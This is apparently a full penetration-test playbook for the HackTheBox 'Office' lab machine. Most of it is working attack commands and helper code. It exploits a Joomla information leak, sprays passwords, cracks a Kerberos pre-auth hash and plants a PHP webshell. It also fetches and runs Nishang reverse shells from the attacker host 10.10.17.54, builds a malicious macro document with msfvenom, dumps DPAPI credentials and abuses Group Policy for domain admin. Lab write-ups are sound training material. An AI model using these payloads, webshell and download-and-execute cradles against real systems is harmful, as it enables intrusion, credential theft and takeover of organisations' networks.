Office - HackTheBox Hard Machine Pentest Playbook
Target: 10.129.230.226 | Attacker: 10.10.17.54
Alternative Toolchain Approach
Phase 0: Environment Setup
# Add domain entries to /etc/hosts
echo '10.129.230.226 office.htb dc.office.htb DC.office.htb' | sudo tee -a /etc/hosts
# Ensure rockyou is decompressed
sudo gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null
# Create working directory
mkdir -p ~/Desktop/HackTheBox-VIP/office && cd ~/Desktop/HackTheBox-VIP/office
Phase 1: Reconnaissance (Nmap)
# Full port discovery with masscan (alternative to nmap -p- for speed)
sudo masscan 10.129.230.226 -p1-65535 --rate=1000 -e tun0 --open | tee masscan_results.txt
# Extract ports and run detailed nmap service scan
ports=$(grep 'open' masscan_results.txt | cut -d ' ' -f4 | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
sudo nmap -sC -sV -p$ports -oN nmap_detailed.txt 10.129.230.226
Expected findings: Domain office.htb, DC hostname DC, Kerberos (88), HTTP/Joomla (80), SMB (445), LDAP (389), WinRM (5985)
Phase 2: Joomla Information Disclosure (CVE-2023-23752)
Same approach: exploit the unauthenticated API endpoint (Joomla 4.0.0 through 4.2.7 lets an unauthenticated client read the config/application and users resources of the web-services API by appending ?public=true; fixed in 4.2.8), different tool: use wget + python3 JSON parsing instead of curl/ruby.
# Fetch Joomla configuration via wget and parse with python3
wget -qO- 'http://office.htb/api/index.php/v1/config/application?public=true' | \
python3 -c "
import sys, json
data = json.load(sys.stdin)
# The endpoint returns one item per setting: {'attributes': {'<setting>': <value>, 'id': <site id>}}
for item in data['data']:
    attrs = item['attributes']
    for k, v in attrs.items():
        if k != 'id':
            print(f'{k}: {v}')
"
Expected output includes:
• user: root
• password: H0lOgrams4reTakIng0Ver754!
• db: joomla_db
• sitename: Holography Industries
# Also grab the users endpoint (one item per account, attributes inline)
wget -qO- 'http://office.htb/api/index.php/v1/users?public=true' | \
python3 -c "
import sys, json
data = json.load(sys.stdin)
for item in data['data']:
    attrs = item['attributes']
    print(f\"[{attrs.get('id')}] {attrs.get('name')} ({attrs.get('group_names', '')}) - {attrs.get('email', '')}\")
"
Expected: Tony Stark (Administrator) - Administrator@holography.htb
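The two one-liners above work, but it helps to see the response shape handled once in a reusable form. The following is an added example, not code from the playbook or from Joomla: it parses payloads constructed to mirror the two endpoints (the config endpoint quirk of one item per setting, each carrying the site id; the users endpoint with attributes inline), picks out the settings worth reporting, and composes the leaked DB connection string. Function names, SENSITIVE_KEYS and the sample JSON are this example's own assumptions.

```python
"""Parse CVE-2023-23752 API responses (config/application and users).
The sample payloads are constructed to match the endpoint shape; they are not
captured traffic."""
import json

# Settings an attacker wants out of config/application (DB, mail and secret key).
SENSITIVE_KEYS = {"user", "password", "db", "host", "dbprefix", "secret", "smtpuser", "smtppass"}

# Constructed sample: config/application returns one item per setting, all sharing id 224.
SAMPLE_CONFIG = json.dumps({
    "links": {"self": "http://office.htb/api/index.php/v1/config/application?public=true"},
    "data": [
        {"type": "application", "id": 224, "attributes": {"sitename": "Holography Industries", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"dbtype": "mysqli", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"host": "localhost", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"user": "root", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"password": "H0lOgrams4reTakIng0Ver754!", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"db": "joomla_db", "id": 224}},
    ],
})

# Constructed sample: users returns one item per account with the attributes inline.
SAMPLE_USERS = json.dumps({
    "data": [
        {"type": "users", "id": "474", "attributes": {
            "id": 474, "name": "Tony Stark", "username": "Administrator",
            "email": "Administrator@holography.htb", "block": 0,
            "group_count": 1, "group_names": "Super Users"}},
    ],
})


def flatten_config(payload: str) -> dict:
    """Merge the per-setting items into one {setting: value} dict, dropping the repeated 'id'."""
    config = {}
    for item in json.loads(payload)["data"]:
        for key, value in item["attributes"].items():
            if key != "id":
                config[key] = value
    return config


def sensitive_config(payload: str) -> dict:
    """Only the settings listed in SENSITIVE_KEYS that the response actually contained."""
    flat = flatten_config(payload)
    return {k: flat[k] for k in sorted(SENSITIVE_KEYS.intersection(flat))}


def mysql_uri(payload: str) -> str:
    """Compose the DB connection string the config endpoint leaks."""
    c = flatten_config(payload)
    return f"mysql://{c['user']}:{c['password']}@{c['host']}/{c['db']}"


def list_users(payload: str) -> list:
    """(username, display name, email, groups) for every account the users endpoint returned."""
    rows = []
    for item in json.loads(payload)["data"]:
        a = item["attributes"]
        rows.append((a.get("username", ""), a.get("name", ""), a.get("email", ""), a.get("group_names", "")))
    return rows


if __name__ == "__main__":
    for k, v in sensitive_config(SAMPLE_CONFIG).items():
        print(f"{k}: {v}")
    print(mysql_uri(SAMPLE_CONFIG))
    for username, name, email, groups in list_users(SAMPLE_USERS):
        print(f"{username}: {name} <{email}> [{groups}]")
```

Pipe the real response into `flatten_config` (for example `json.load(sys.stdin)` as in the one-liners) and the same functions apply; the leaked DB password is what gets sprayed in Phase 4.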
Phase 3: Kerberos User Enumeration
Same approach: Enumerate valid domain users, different tool: use nmap krb5-enum-users NSE script instead of Kerbrute.
# Use nmap's kerberos enumeration script with kali's built-in username list
sudo nmap -p88 --script krb5-enum-users \
--script-args="krb5-enum-users.realm='office.htb',userdb=/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" \
10.129.230.226 -oN kerb_users.txt
# Extract just the discovered usernames (the script prints each principal as user@realm)
grep -o '[A-Za-z0-9._-]*@office\.htb' kerb_users.txt | cut -d'@' -f1 | sort -u > domain_users.txt
If nmap is too slow, alternative approach with impacket lookupsid:
# Use impacket-lookupsid with null session or dwolfe creds (after Phase 4)
impacket-lookupsid 'office.htb/dwolfe:H0lOgrams4reTakIng0Ver754!@10.129.230.226' | \
    grep SidTypeUser | awk '{print $2}' | cut -d'\' -f2 > domain_users.txt
Note: lookupsid prints OFFICE\name, so the cut delimiter is a single backslash; machine accounts (DC$) are also SidTypeUser and can be dropped from the list.
Expected users: ewhite, etower, dwolfe, dmichael, dlanor, administrator
# Save users file manually if enumeration is slow
cat > domain_users.txt << 'EOF'
ewhite
etower
dwolfe
dmichael
dlanor
administrator
EOF
Phase 4: Password Spray via SMB
Same approach: Spray the Joomla DB password against domain users, different tool: use hydra instead of NetExec/CrackMapExec.
# Password spray with hydra against SMB
hydra -L domain_users.txt -p 'H0lOgrams4reTakIng0Ver754!' smb://10.129.230.226 -V -f
Alternative with impacket if the hydra SMB module is unreliable:
# Loop impacket-smbclient for the spray. It reads commands from a file (-file), not from -c,
# and exits 0 even when the logon fails, so test the output for STATUS_LOGON_FAILURE instead of the exit status
printf 'shares\nexit\n' > smb_cmds.txt
while IFS= read -r user; do
    echo "[*] Trying: $user"
    if impacket-smbclient "office.htb/${user}:H0lOgrams4reTakIng0Ver754!@10.129.230.226" -file smb_cmds.txt 2>&1 | grep -q 'STATUS_LOGON_FAILURE'; then
        echo "[-] FAILED: $user"
    else
        echo "[+] SUCCESS: $user"
    fi
done < domain_users.txt
Expected result: dwolfe:H0lOgrams4reTakIng0Ver754! is valid.
Phase 5: SMB Share Enumeration & PCAP Download
Same approach: Access SOC Analysis share and download PCAP, different tool: use impacket-smbclient instead of smbclient.
# List shares with impacket
printf 'shares\nexit\n' > smb_cmds.txt
impacket-smbclient 'office.htb/dwolfe:H0lOgrams4reTakIng0Ver754!@10.129.230.226' -file smb_cmds.txt
# Connect and download the PCAP
impacket-smbclient 'office.htb/dwolfe:H0lOgrams4reTakIng0Ver754!@10.129.230.226'
Inside the impacket-smbclient prompt (the prompt character is #):
# use SOC Analysis
# ls
# get Latest-System-Dump-8fbc124d.pcap
# exit
Phase 6: PCAP Analysis - Extract Kerberos Pre-Auth Hash
Same approach: Find Kerberos AS-REQ pre-auth timestamp, different tool: use tshark CLI instead of Wireshark GUI.
# Filter for Kerberos AS-REQ packets containing pre-auth data
tshark -r Latest-System-Dump-8fbc124d.pcap -Y "kerberos.msg_type == 10" -T fields \
-e kerberos.CNameString -e kerberos.realm -e kerberos.cipher 2>/dev/null
# More detailed extraction - only AS-REQs that carry PA-ENC-TIMESTAMP (padata type 2)
tshark -r Latest-System-Dump-8fbc124d.pcap \
    -Y "kerberos.msg_type == 10 && kerberos.padata_type == 2" \
    -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher \
    -e kerberos.etype 2>/dev/null
Expected: User tstark, realm OFFICE.HTB, etype 18, and the encrypted timestamp cipher. tshark joins repeated fields of one packet with commas: the first kerberos.etype is the one inside PA-ENC-TIMESTAMP, the later values are the client's supported-etype list from req-body and are not part of the hash.
# Extract the raw hex cipher bytes for hash construction
tshark -r Latest-System-Dump-8fbc124d.pcap \
    -Y "kerberos.msg_type == 10 && kerberos.padata_type == 2" \
    -T fields -e kerberos.cipher 2>/dev/null | head -5
Construct the hashcat/john format hash:
# Format: $krb5pa$18$tstark$OFFICE.HTB$<cipher_hex>  (hashcat mode 19900; an etype 17 capture would be $krb5pa$17$ / mode 19800)
# john's krb5pa-sha1 documents the layout with an extra salt field, $krb5pa$18$tstark$OFFICE.HTB$$<cipher_hex>
# (empty salt = default realm+user); if john rejects the line below, insert that empty field
# Save to file
echo '$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc' > krb_hash.txt
Phase 7: Crack Kerberos Hash
Same approach: Crack the pre-auth hash, different tool: use john (John the Ripper) instead of hashcat.
# Crack with john using rockyou
john --format=krb5pa-sha1 --wordlist=/usr/share/wordlists/rockyou.txt krb_hash.txt
# Show cracked result
john --show krb_hash.txt
Expected password: playboy69
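Tying Phase 6 to Phase 7 in one place, here is an added example (not the playbook's own code): it takes a line in the exact layout that the tshark fields command produces (tab-separated; repeated fields comma-joined), keeps only the pre-auth etype, validates the ciphertext, and emits the `$krb5pa$` line in either the hashcat layout (no salt field) or john's documented krb5pa-sha1 layout (empty salt field). The tshark line and the 56-byte ciphertext are constructed for the example; AES_FORMATS and the function names are this example's assumptions.

```python
"""Build the $krb5pa$ hash for AES Kerberos pre-auth from tshark field output.
Sample input is constructed to match:
  tshark -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher -e kerberos.etype"""
import re

# Constructed sample: one AS-REQ. The first etype (18) belongs to PA-ENC-TIMESTAMP;
# the remaining values are the client's supported-etype list from req-body.
SAMPLE_CIPHER = "a1b2c3d4" * 14  # 56 bytes, the same length as the Phase 6 capture
SAMPLE_TSHARK = f"tstark\tOFFICE.HTB\t{SAMPLE_CIPHER}\t18,18,17,23,24,-135"

# Pre-auth etype -> (john --format, hashcat -m) for the two AES variants.
AES_FORMATS = {17: ("krb5pa-sha1", 19800), 18: ("krb5pa-sha1", 19900)}


def parse_tshark_fields(line: str) -> dict:
    """Split one tshark fields line; keep the first value of each multi-valued field."""
    cols = line.rstrip("\n").split("\t")
    if len(cols) != 4:
        raise ValueError(f"expected 4 tab-separated fields, got {len(cols)}")
    user, realm, cipher, etype = (c.split(",")[0] for c in cols)
    return {"user": user, "realm": realm, "cipher": cipher.lower(), "etype": int(etype)}


def build_krb5pa(user: str, realm: str, etype: int, cipher_hex: str, style: str = "hashcat") -> str:
    """$krb5pa$<etype>$<user>$<realm>$<cipher> for AES pre-auth (etype 17/18).
    RC4 (etype 23) uses a different layout with a salt value, so it is refused here."""
    if etype not in AES_FORMATS:
        raise ValueError(f"etype {etype} is not AES pre-auth; build the RC4 layout separately")
    if not re.fullmatch(r"[0-9a-f]+", cipher_hex) or len(cipher_hex) % 2:
        raise ValueError("cipher must be an even-length hex string")
    if style == "hashcat":
        return f"$krb5pa${etype}${user}${realm}${cipher_hex}"
    if style == "john":
        # john's krb5pa-sha1 layout carries a salt field; empty means the default realm+user salt
        return f"$krb5pa${etype}${user}${realm}$${cipher_hex}"
    raise ValueError("style must be 'hashcat' or 'john'")


def cracker_args(etype: int) -> dict:
    """Which john --format and hashcat -m consume the hash just built."""
    fmt, mode = AES_FORMATS[etype]
    return {"john_format": fmt, "hashcat_mode": mode}


def hash_from_tshark(line: str, style: str = "hashcat") -> str:
    f = parse_tshark_fields(line)
    return build_krb5pa(f["user"], f["realm"], f["etype"], f["cipher"], style)


if __name__ == "__main__":
    print(hash_from_tshark(SAMPLE_TSHARK))
    print(hash_from_tshark(SAMPLE_TSHARK, style="john"))
    print(cracker_args(parse_tshark_fields(SAMPLE_TSHARK)["etype"]))
```

Feed the real tshark output through `hash_from_tshark` line by line; if several AS-REQs exist (retries after a wrong password), each one yields a separate candidate and all of them crack to the same password.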
Phase 8: Joomla Admin Access & RCE (Foothold)
Same approach: Login to Joomla admin, edit template for PHP RCE, different execution: use Invoke-PowerShellTcp.ps1 (Nishang) instead of nc64.exe.
8.1 - Login to Joomla Admin Panel
URL: http://office.htb/administrator
Username: Administrator (Tony Stark)
Password: playboy69
8.2 - Inject Webshell into Template
Navigate: System → Site Templates → Cassiopeia Details and Files → error.php
Inject at the top of error.php:
<?php if (isset($_REQUEST['c'])) { system($_REQUEST['c']); } ?>
Using error.php instead of index.php is stealthier and avoids breaking the site; the file is still reachable directly at /templates/cassiopeia/error.php.
8.3 - Verify RCE
wget -qO- 'http://office.htb/templates/cassiopeia/error.php?c=whoami'
Expected: office\web_account
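Every command sent to error.php travels in a query string, so spaces, quotes, `+` and `/` have to be percent-encoded or PHP decodes them into something else (a raw `+` becomes a space). The helper below is an added example, not part of the playbook or of Joomla: it builds the webshell URL for any command and produces both trigger forms used in the next step, the `-c` cradle and the `-enc` base64/UTF-16LE variant. The host, port and script names are the playbook's; the function names and WEBSHELL constant are this example's own.

```python
"""Build safe URLs for the error.php webshell and PowerShell download cradles."""
import base64
from urllib.parse import urlencode

WEBSHELL = "http://office.htb/templates/cassiopeia/error.php"  # path injected in 8.2


def webshell_url(cmd: str, base: str = WEBSHELL, param: str = "c") -> str:
    """Percent-encode cmd as the value of ?c=... so that spaces, '+', '&', '"' and '/'
    reach system() intact (urlencode uses quote_plus: space -> '+', '+' -> '%2B')."""
    return f"{base}?{urlencode({param: cmd})}"


def encoded_command(ps: str) -> str:
    """What powershell -enc expects: base64 of the UTF-16LE encoding of the script text."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


def download_cradle(host: str, port: int, script: str) -> str:
    """In-memory download-and-execute cradle used for the Nishang reverse shell."""
    return f"IEX(New-Object Net.WebClient).DownloadString('http://{host}:{port}/{script}')"


def inline_trigger(host: str, port: int, script: str) -> str:
    """Variant 1: the cradle passed to -c inside literal double quotes (all percent-encoded)."""
    return webshell_url(f'powershell -ep bypass -c "{download_cradle(host, port, script)}"')


def encoded_trigger(host: str, port: int, script: str) -> str:
    """Variant 2: the cradle passed via -enc, so no quotes or parentheses ever reach cmd.exe."""
    return webshell_url(f"powershell -ep bypass -enc {encoded_command(download_cradle(host, port, script))}")


if __name__ == "__main__":
    print(webshell_url("whoami /priv"))
    print(inline_trigger("10.10.17.54", 8888, "shell.ps1"))
    print(encoded_trigger("10.10.17.54", 8888, "shell.ps1"))
```

Pass the returned URL to `wget -qO-` in single quotes; because `urlencode` turns the base64 `+` into `%2B`, the `-enc` variant no longer breaks when the encoded cradle happens to contain a plus sign.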
8.4 - Get Reverse Shell via Nishang PowerShell
# Download Nishang reverse shell script to our working dir
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shell.ps1
# Append auto-execution line at the bottom
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.54 -Port 9001' >> shell.ps1
# Start Python HTTP server to host the payload
python3 -m http.server 8888 &
# Start listener with rlwrap for better shell experience
rlwrap nc -nlvp 9001
Trigger the download-and-execute:
# URL-encode the PowerShell cradle and fire it
# URL-encode the PowerShell cradle and fire it ('+' decodes to a space in the query string)
wget -qO- "http://office.htb/templates/cassiopeia/error.php?c=powershell+-ep+bypass+-c+\"IEX(New-Object+Net.WebClient).DownloadString('http://10.10.17.54:8888/shell.ps1')\""
Alternative trigger if encoding issues arise:
# Base64-encode the cradle as UTF-16LE for -enc. Base64 output can contain '+', which the server would
# decode as a space, so percent-encode it before it goes into the query string
PAYLOAD=$(echo -n "IEX(New-Object Net.WebClient).DownloadString('http://10.10.17.54:8888/shell.ps1')" | iconv -t UTF-16LE | base64 -w0 | sed 's/+/%2B/g')
wget -qO- "http://office.htb/templates/cassiopeia/error.php?c=powershell+-ep+bypass+-enc+${PAYLOAD}"
Phase 9: Lateral Movement → tstark (user.txt)
Same approach: Use RunasCs with cracked password, different transport: use Invoke-PowerShellTcp again for the new shell.
9.1 - Upload RunasCs
# On attacker: host RunasCs.exe (download from GitHub releases if needed)
# In the web_account shell:
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/RunasCs.exe' -OutFile 'C:\Windows\Temp\RunasCs.exe'"
9.2 - Get Shell as tstark
Create shell2.ps1 on the attacker, same as shell.ps1 but calling back to port 9002 (the HTTP server from 8.4 still serves the working dir):
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./shell2.ps1
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.54 -Port 9002' >> shell2.ps1
Start a second listener:
rlwrap nc -nlvp 9002
Execute RunasCs from the web_account shell; playboy69 is tstark's domain password, so the domain is given with -d, and -l 8 selects the NetworkCleartext logon type:
C:\Windows\Temp\RunasCs.exe tstark playboy69 "powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.17.54:8888/shell2.ps1')\"" -d office.htb -l 8
9.3 - Read user.txt
type C:\Users\tstark\Desktop\user.txt
Phase 10: Internal Port Forward (Port 8083)
Same approach: Forward internal port 8083, different tool: use ligolo-ng instead of chisel.
Option A: ligolo-ng (preferred alternative)
# On attacker - start ligolo proxy
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
# 240.0.0.1 is ligolo-ng's magic address for the agent's own loopback; route it into the tun
sudo ip route add 240.0.0.1/32 dev ligolo
./proxy -selfcert -laddr 0.0.0.0:11601
# On target (tstark shell) - download and run ligolo agent
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/agent.exe' -OutFile 'C:\Windows\Temp\agent.exe'"
C:\Windows\Temp\agent.exe -connect 10.10.17.54:11601 -ignore-cert
# In ligolo proxy console:
# session    (select the agent session)
# start      (bring up the tunnel; the target's 127.0.0.1:8083 is now reachable from Kali as http://240.0.0.1:8083)
Do not route 127.0.0.1/32 into the tun (that breaks Kali's own loopback), and do not use listener_add for this: it opens a port on the agent that forwards back to the proxy, i.e. a reverse forward, not a way to reach the target's localhost.
Option B: SSH Remote Port Forward (simpler fallback)
If ligolo is unavailable, use plink.exe:
# On target - use plink for port forward
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/plink.exe' -OutFile 'C:\Windows\Temp\plink.exe'"
echo y | C:\Windows\Temp\plink.exe -ssh -R 8083:127.0.0.1:8083 root@10.10.17.54 -pw <YOUR_KALI_PASSWORD> -N
This sends the Kali password to the target in the clear and on a command line; use a throwaway low-privilege SSH account for the forward rather than root.
Option C: chisel alternative (if others fail)
# On attacker
chisel server --reverse --port 8001
# On target
C:\Windows\Temp\chisel.exe client 10.10.17.54:8001 R:8083:127.0.0.1:8083
Now access the Job application portal in a browser: http://127.0.0.1:8083 with the local listeners of Options B and C, or http://240.0.0.1:8083 when the ligolo tun route of Option A is in place.
Phase 11: LibreOffice Macro Exploitation → PPotts
Same approach: Craft malicious ODT with macro, lower MacroSecurityLevel registry, different tool: use macro_pack or manual ODF macro injection instead of Metasploit.
11.1 - Lower MacroSecurityLevel (from tstark shell)
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 0 /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"
11.2 - Generate Malicious ODT with msfvenom + manual embed
Method: msfvenom macro → embed in ODT manually
# Generate VBA macro payload with msfvenom
# Generate a macro payload with msfvenom. Note: -f vba emits Microsoft Office VBA, which LibreOffice
# does not run as-is; an ODT needs a StarBasic macro, so this output must be translated by hand before embedding
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.54 LPORT=9003 -f vba -o macro.vba
Alternative: use macro_pack for direct document generation (a Windows-only tool; confirm the template and listener options against macro_pack's help for the installed version):
# If macro_pack is available:
echo 'windows/x64/shell_reverse_tcp' | macro_pack -t SHELLCODE -o -G payload.odt \
    --listen=10.10.17.54 --port=9003
If using Metasploit (fallback but different options):
msfconsole -q -x "
use exploit/multi/misc/openoffice_document_macro;
set payload windows/x64/shell_reverse_tcp;
set SRVHOST 10.10.17.54;
set SRVPORT 8080;
set LHOST 10.10.17.54;
set LPORT 9003;
set FILENAME resume.odt;
run -j"
The Metasploit route writes resume.odt under ~/.msf4/local/ and runs its own handler on 9003, so skip the separate nc listener in that case.
11.3 - Start listener and upload ODT
# Listener for PPotts callback (msfvenom / macro_pack payloads)
rlwrap nc -nlvp 9003
From the web_account shell (which has write access to the applications folder):
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/resume.odt' -OutFile 'C:\xampp\htdocs\internal\applications\resume.odt'"
Wait 1-3 minutes for PPotts to open the file.
Phase 12: DPAPI Credential Extraction → HHogan
Same approach: Extract DPAPI master key via MS-BKRP RPC, decrypt stored credentials, different tool: use SharpDPAPI.exe instead of mimikatz.
12.1 - Enumerate credentials (from PPotts shell)
# List credential files
Get-ChildItem -Force C:\Users\ppotts\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\ppotts\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Force 'C:\Users\ppotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\'
12.2 - Use SharpDPAPI for automatic decryption via RPC
# Upload SharpDPAPI to target
# From PPotts shell:
powershell -ep bypass -c "Invoke-WebRequest -Uri 'http://10.10.17.54:8888/SharpDPAPI.exe' -OutFile 'C:\Windows\Temp\SharpDPAPI.exe'"
C:\Windows\Temp\SharpDPAPI.exe credentials /rpc
This single command will:
• Find all credential files for the current user
• Request master key decryption from the DC via MS-BKRP (the DC decrypts a master key for the user who owns it, so PPotts's password is not needed)
• Decrypt and display all stored credentials
Expected output includes:
TargetName: Domain:interactive=OFFICE\HHogan
UserName: OFFICE\HHogan
Credential: H4ppyFtW183#
12.3 - Alternative: impacket-dpapi (from attacker machine)
If SharpDPAPI upload is problematic, exfiltrate the files:
# After downloading the masterkey and credential files to the attacker machine.
# The master key still has to be decrypted: PPotts's password is unknown, so the only route is the
# MS-BKRP restore call, which needs PPotts's credentials or ticket from the attacker side. Check
# `impacket-dpapi masterkey -h` for the options your impacket version offers before relying on -rpc;
# if it is not available, run SharpDPAPI on the host as in 12.2 instead.
impacket-dpapi masterkey -file 191d3f9d-7959-4b4d-a520-a444853c47eb \
    -rpc office.htb/ppotts@dc.office.htb
# -key takes the value exactly as the masterkey step prints it, including the 0x prefix
impacket-dpapi credential -file 84F1CAEEBF466550F4967858F9353FB4 \
    -key 0x<decrypted_masterkey_hex>
Phase 13: WinRM as HHogan & GPO Abuse → root.txt
Same approach: Leverage GPO Managers group to add HHogan to local admins, different tool: use pyGPOAbuse (Python) instead of SharpGPOAbuse.exe.
13.1 - Connect via evil-winrm
evil-winrm -i 10.129.230.226 -u hhogan -p 'H4ppyFtW183#'
13.2 - Enumerate GPO permissions with PowerView
# Upload and load PowerView
upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
. .\PowerView.ps1
# Check GPO permissions for GPO Managers
$sid = (Get-DomainGroup -Identity "GPO Managers").objectsid
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid} | select ObjectDN, ActiveDirectoryRights
13.3 - GPO Abuse with pyGPOAbuse (from attacker machine)
Different tool: Use pyGPOAbuse.py (Python) instead of SharpGPOAbuse.exe:
# Clone if not installed
git clone https://github.com/Hackndo/pyGPOAbuse.git 2>/dev/null
cd pyGPOAbuse
# Add HHogan to local administrators via Default Domain Controllers Policy
python3 pygpoabuse.py 'office.htb/hhogan:H4ppyFtW183#' \
-gpo-id "6AC1786C-016F-11D2-945F-00C04fB984F9" \
    -command 'net localgroup administrators hhogan /add' \
    -taskname "WindowsUpdate" \
    -description "Security Update Task" \
    -f
Alternative: if pyGPOAbuse has issues, use SharpGPOAbuse from the WinRM session:
# Upload and execute
upload SharpGPOAbuse.exe
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "SysMonitor" --Author Office\Administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators hhogan /add" --GPOName "DEFAULT DOMAIN CONTROLLERS POLICY"
13.4 - Force GPO Update
# From evil-winrm session
gpupdate /force
13.5 - Verify and Read Root Flag
# Reconnect with evil-winrm (new session to refresh token)
evil-winrm -i 10.129.230.226 -u hhogan -p 'H4ppyFtW183#'
# Verify admin membership
net user hhogan
whoami /groups
# Read root flag
type C:\Users\Administrator\Desktop\root.txt
Tool Differences Summary
Flags Location
• user.txt: C:\Users\tstark\Desktop\user.txt
• root.txt: C:\Users\Administrator\Desktop\root.txt
Notes
• All wordlists use Kali built-in paths: /usr/share/wordlists/rockyou.txt, /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
• If seclists is not at /usr/share/seclists/, install it with: sudo apt install seclists
• Download tools: RunasCs, SharpDPAPI, ligolo-ng agent from their GitHub releases
• Always verify each step before proceeding to the next